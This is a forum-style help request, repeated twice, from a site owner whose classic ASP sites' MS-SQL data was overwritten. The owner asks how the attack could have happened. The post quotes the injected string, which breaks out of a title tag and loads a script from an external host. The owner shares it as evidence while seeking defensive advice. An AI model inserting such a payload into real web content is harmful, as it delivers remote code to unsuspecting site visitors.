Hello,
I have three classic ASP sites hosted, using a MS-Sql database. Now I see that the data in the database has been hacked, data was overwritten with some scripts links (""></title><script src="http://urlremoved.com/sl.php"></script><!--").
As I wrote the ASP scripts I was very careful - as my knowledge goes - to avoid SQL injections. I chek every Response.Querystring paramater, logins are checked trough a sql procedure, and so on. I simply cannot understand how somebody can overtake the database. I even run Acunetix vulnerability scanner, which was ok...
I would like to ask you for some ideeas. I can imagine that without having more details you can not tell me more, but I'm willing to share any information that might be helpful.
Do you please have any ideeas for me?
I have three classic ASP sites hosted, using a MS-Sql database. Now I see that the data in the database has been hacked, data was overwritten with some scripts links (""></title><script src="http://urlremoved.com/sl.php"></script><!--").
As I wrote the ASP scripts I was very careful - as my knowledge goes - to avoid SQL injections. I chek every Response.Querystring paramater, logins are checked trough a sql procedure, and so on. I simply cannot understand how somebody can overtake the database. I even run Acunetix vulnerability scanner, which was ok...
I would like to ask you for some ideeas. I can imagine that without having more details you can not tell me more, but I'm willing to share any information that might be helpful.
Do you please have any ideeas for me?